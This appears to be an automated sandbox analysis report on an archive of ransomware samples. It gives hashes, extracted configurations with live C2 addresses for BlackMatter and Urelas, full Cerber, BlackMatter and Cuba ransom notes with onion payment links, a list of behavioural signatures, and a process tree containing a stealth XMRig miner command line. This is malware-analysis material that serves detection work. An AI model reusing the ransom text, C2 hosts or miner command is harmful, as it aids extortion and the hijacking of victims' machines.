Analysis

  • max time kernel
    168s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-09-2024 14:09

General

  • Target

    RNSM00480.7z

  • Size

    26.3MB

  • MD5

    eddd0c8d8f9919c8a2d18a25047d1b8c

  • SHA1

    06c72f0c222805e448a3a5f15c204ddca9b65492

  • SHA256

    3a6cee5509bb09d4e479d91dbf1ba292e76686c14c6a1049de7c0e0ddbdf7a2b

  • SHA512

    68c7cb44dfc9c2b184844825e94a7f6ab122ad0eae8a1bd6eaf1132357c209976563eea702b5f6123a23c682f9aff23095f5307954809fa3e93ff0ea14eb3f6b

  • SSDEEP

    393216:pSaU4WVWKWzPcGR3Rh5+bNAyie1ZEkkR7jxxacZ+HrMBnmHcLN0uYXKY3CBB0Ddl:dXTbR35S3PPe7j1sYg8LoXvSB4CTNA

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\+REcovER+kwixt+.txt

Ransom Note
{}_~_~+ -$.-_+$|~~_|| =|_$.**+-~| $+|=*.-=| !!! IMPORTANT INFORMATION !!!! All of your files are encrypted with RSA-4096. More information about the RSA algorythm can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server. To receive your private key follow one of the links: 1. http://88fga.ketteaero.com/C87BFBF0377562DB 2. http://2bdfb.spinakrosa.at/C87BFBF0377562DB 3. http://uj5nj.onanwhit.com/C87BFBF0377562DB If all of the addresses are not available, follow these steps: 1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html 2. After a successful installation, run the browser and wait for initialization. 3. Type in the address bar: k7tlx3ghr3m4n2tu.onion/C87BFBF0377562DB 4. Follow the instructions on the site. !!! Your personal identification ID: C87BFBF0377562DB !!! )(*=~_$~+$==-$*~=$$ __$-=-+*
URLs

http://88fga.ketteaero.com/C87BFBF0377562DB

http://2bdfb.spinakrosa.at/C87BFBF0377562DB

http://uj5nj.onanwhit.com/C87BFBF0377562DB

http://k7tlx3ghr3m4n2tu.onion/C87BFBF0377562DB

Extracted

Family

blackmatter

Version

2.0

Botnet

207aab0afc614ac68359fc63f9665961

C2

https://fluentzip.org

http://fluentzip.org

Attributes
  • attempt_auth

    false

  • create_mutex

    true

  • encrypt_network_shares

    true

  • exfiltrate

    true

  • mount_volumes

    true

rsa_pubkey.base64
aes.base64

Extracted

Path

F:\WzEgyMggM.README.txt

Family

blackmatter

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' . >>> What happens? Your network is encrypted, and currently not operational. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data. >>> What data stolen? From your network was stolen sensitive data. If you do not contact us we will publish all your data in our blog and will send it to the biggest mass media. >>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises. >> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24maprinktc7uizgfyqhisx7lkszb6ogh6lwdzpac23w3mh4tvyd.onion/EWX33VYY3IGOXSG5ZZ2 >> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24maprinktc7uizgfyqhisx7lkszb6ogh6lwdzpac23w3mh4tvyd.onion/EWX33VYY3IGOXSG5ZZ2

Extracted

Family

urelas

C2

1.234.83.146

133.242.129.155

218.54.31.226

218.54.31.165

112.175.88.207

112.175.88.208

218.54.30.235

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\_R_E_A_D___T_H_I_S___JQ6X30OI_.txt

Ransom Note
Hi, I'am CERBER RANSOMWARE ;) ----- YOUR DOCUMENTS, PH0T0S, DATABASES AND 0THER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/30C0-25AF-6105-0006-4DCA Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA 2. http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA 3. http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA 4. http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA 5. http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----
URLs

http://xpcx6erilkjced3j.onion/30C0-25AF-6105-0006-4DCA

http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA

http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA

http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA

http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA

http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\_R_E_A_D___T_H_I_S___ZX0XEV_.hta

Family

cerber

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>C&#069;&#82;B&#069;&#82; &#82;&#65;NS&#79;MW&#65;&#82;&#069;: Instructi&#111;ns</title> <HTA:APPLICATION APPLICATIONNAME="ZJXHD8" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style type="text/css"> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url("data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=") left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">&#9745; English</a> <h1>C&#069;&#82;BE&#82; &#82;ANSOMWA&#82;&#069;</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return sh_bl('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return sh_bl('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return sh_bl('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return sh_bl('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return sh_bl('fr');">Français</a></li> <li><a href="#" title="German" onclick="return sh_bl('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return sh_bl('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return sh_bl('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return sh_bl('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return sh_bl('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return sh_bl('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return sh_bl('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return sh_bl('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't yo<span class="h">4ERtMwRC9</span>u find the necessary files?<br>Is the c<span class="h">0179R</span>ontent of your files not readable?</p> <p>It is normal be<span class="h">PVbtv</span>cause the files' names and the data in your files have been encryp<span class="h">vQHchJ</span>ted by "Ce<span class="h">bftBoq58d</span>r&#98;er&nbsp;Rans&#111;mware".</p> <p>It me<span class="h">Sc</span>ans your files are NOT damage<span class="h">T7QmXvoa</span>d! Your files are modified only. This modification is reversible.<br>F<span class="h">K1aSjsNUrD</span>rom now it is not poss<span class="h">XMyW4</span>ible to use your files until they will be decrypted.</p> <p>The only way to dec<span class="h">VZpvQp4kx</span>rypt your files safely is to &#98;uy the special decryption software "C<span class="h">CqfVSrb5X</span>er&#98;er&nbsp;Decryptor".</p> <p>Any attempts to rest<span class="h">BlyCxo</span>ore your files with the thir<span class="h">BKVZLflii</span>d-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proc<span class="h">3t7hPZUNP</span>eed with purchasing of the decryption softw<span class="h">K</span>are at your personal page:</p> <p><span class="info"><span class="updating">Ple<span class="h">oPMPlJPyRv</span>ase wait...</span><a class="url" href="http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA</a></span></p> <p>If t<span class="h">RYpJXd</span>his page cannot be opened &nbsp;<span class="button" onclick="return _url_upd_('en');">cli<span class="h">3LL</span>ck here</span>&nbsp; to get a new addr<span class="h">PHB5d</span>ess of your personal page.<br><br>If the addre<span class="h">hKqTXnyFX</span>ss of your personal page is the same as befo<span class="h">87</span>re after you tried to get a new one,<br>you c<span class="h">3jSBt</span>an try to get a new address in one hour.</p> <p>At th<span class="h">f</span>is p&#097;ge you will receive the complete instr<span class="h">u</span>uctions how to buy the decrypti<span class="h">7RJUDD</span>on software for restoring all your files.</p> <p>Also at this p&#097;ge you will be able to res<span class="h">YHDCU2f0</span>tore any one file for free to be sure "Cer&#98;e<span class="h">pHkugB</span>r&nbsp;Decryptor" will help you.</p> <hr> <p>If your per<span class="h">IS</span>sonal page is not availa<span class="h">1v</span>ble for a long period there is another way to open your personal page - insta<span class="h">V6PCxi</span>llation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Inte<span class="h">ZiWz</span>rnet browser (if you do not know wh&#097;t it is run the Internet&nbsp;Explorer);</li> <li>ent<span class="h">qJ1</span>er or copy the &#097;ddress <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/downlo&#097;d/download-easy.html.en</a> into the address bar of your browser &#097;nd press ENTER;</li> <li>wait for the site load<span class="h">HcBuO</span>ing;</li> <li>on the site you will be offered to do<span class="h">Zqa</span>wnload Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ru<span class="h">wsUAxXX</span>n Tor&nbsp;Browser;</li> <li>connect with the butt<span class="h">Ypd</span>on "Connect" (if you use the English version);</li> <li>a normal Internet bro<span class="h">WSg</span>wser window will be opened &#097;fter the initialization;</li> <li>type or copy the add<span class="h">wrx</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/30C0-25AF-6105-0006-4DCA</span><br> in this browser address bar;</li> <li>pre<span class="h">PIUZ6fG</span>ss ENTER;</li> <li>the site sho<span class="h">erd5cCk7R</span>uld be loaded; if for some reason the site is not lo<span class="h">o7r5Bp15</span>ading wait for a moment and try again.</li> </ol> <p>If you have any pr<span class="h">dGEjio</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">H0gRq2</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Addit<span class="h">qVPGedg</span>ional information:</strong></p> <p>You will fi<span class="h">JOe</span>nd the instru<span class="h">X</span>cti&#111;ns ("*_R_E_A_D___T_H_I_S_*.hta") for re<span class="h">f5g5K3p</span>st&#111;ring y&#111;ur files in &#097;ny f<span class="h">Y</span>&#111;lder with your enc<span class="h">0j0OjM</span>rypted files.</p> <p>The instr<span class="h">QVK</span>ucti&#111;ns "*_R_E_A_D___T_H_I_S_*.hta" in the f<span class="h">T</span>&#111;lder<span class="h">CgBzYQ</span>s with your encry<span class="h">re</span>pted files are not vir<span class="h">F7iA6FE6</span>uses! The instruc<span class="h">Ebd2Y</span>tions "*_R_E_A_D___T_H_I_S_*.hta" will he<span class="h">hdbiW</span>lp you to dec<span class="h">AgrN0</span>rypt your files.</p> <p>Remembe<span class="h">1ih4t</span>r! The w&#111;rst si<span class="h">um</span>tu&#097;tion already happ<span class="h">jac7UnV</span>ened and n&#111;w the future of your files de<span class="h">zV40eW4V</span>pends on your determ<span class="h">H0n6XMYN</span>ination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور ع<span class="h">63A</span>لى الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيع<span class="h">2s0</span>ي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cer&#98;er&nbsp;Rans&#111;mware".</p> <p>وهذا يعني أن<span class="h">5XHiO8gd</span> الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحي<span class="h">PwWM</span>دة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cer&#98;er&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة<span class="h">bgNS4r</span> الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.tor2web.org/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.link/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.nu/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.cab/30C0-25AF-6105-0006-4DCA</a><hr><a href="http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA" target="_blank">http://xpcx6erilkjced3j.onion.to/30C0-25AF-6105-0006-4DCA</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return _url_upd_('ar');">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cer&#98;er&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://xpcx6erilkjced3j.onion/30C0-25AF-6105-0006-4DCA</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إض<span class="h">J2kNd4V</span>افية:</strong></p> <p>سوف تجد <span class="h">fzU4XwCm</span>إرشادات استعادة الملفات الخاصة بك ("*_R_E_A_D___T_H_I_S_*") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*_RE<span class="h">hDVzR0</span>AD_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_R_E_A_D___T_H_I_S_*") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بال<span class="h">JMe70q6LDR</span>فعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需<span class="h">5UL6AVhVx</span>的文件?<br>您文件的内容无法阅读?</p> <p>这是正常��

Extracted

Path

C:\Program Files\Common Files\DESIGNER\!! READ ME !!.txt

Ransom Note
Good day. All your files are encrypted. For decryption contact us. Write here [email protected] reserve [email protected] jabber [email protected] We also inform that your databases, ftp server and file server were downloaded by us to our servers. If we do not receive a message from you within three days, we regard this as a refusal to negotiate. Check our platform: http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion/ * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Do not stop process of encryption, because partial encryption cannot be decrypted.
URLs

http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion/

Signatures

  • AtomSilo

    Ransomware family first seen in September 2021.

  • AtomSilo Ransomware 1 IoCs
  • BlackMatter Ransomware

    BlackMatter ransomware group claims to be Darkside and REvil succesor.

  • Cerber 2 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Urelas

    Urelas is a trojan targeting card games.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (132) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (55) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • XMRig Miner payload 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Contacts a large (1126) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Patched UPX-packed file 1 IoCs

    Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 4 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 7 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00480.7z
    1⤵
    • Modifies registry class
    PID:4916
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1868
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1124
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00480.7z"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4868
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /1
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious use of AdjustPrivilegeToken
        PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5ea07c8da7781767b8085b2a8a43dd20187738d10017cbbf199d42caf2172d4f.exe
          HEUR-Trojan-Ransom.MSIL.Blocker.gen-5ea07c8da7781767b8085b2a8a43dd20187738d10017cbbf199d42caf2172d4f.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1620
          • C:\Users\Admin\AppData\Roaming\Services.exe
            "C:\Users\Admin\AppData\Roaming\Services.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:1940
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=eu1.hellominer.com:4400 --user=8BQbtadKggfjM36Ykvam8B8eKg9WUFJooo4CUb3HRZNpe1UFF2kLLonB7UtV97nMVRn1w2bM656PLog19npoErZ98viexry --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=3 --unam-idle-cpu=80 --unam-stealth
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3900
        • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Agent.gen-93db1fb7ce3920e2b518b5df59abf0283e4630e5446e6af9883fae0e17e28f99.exe
          HEUR-Trojan-Ransom.Win32.Agent.gen-93db1fb7ce3920e2b518b5df59abf0283e4630e5446e6af9883fae0e17e28f99.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
        • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Bitman.vho-24c72c89dead0d71ad751d1cb5a6fe956586952ec555ebeeb6e6d0901763c154.exe
          HEUR-Trojan-Ransom.Win32.Bitman.vho-24c72c89dead0d71ad751d1cb5a6fe956586952ec555ebeeb6e6d0901763c154.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2296
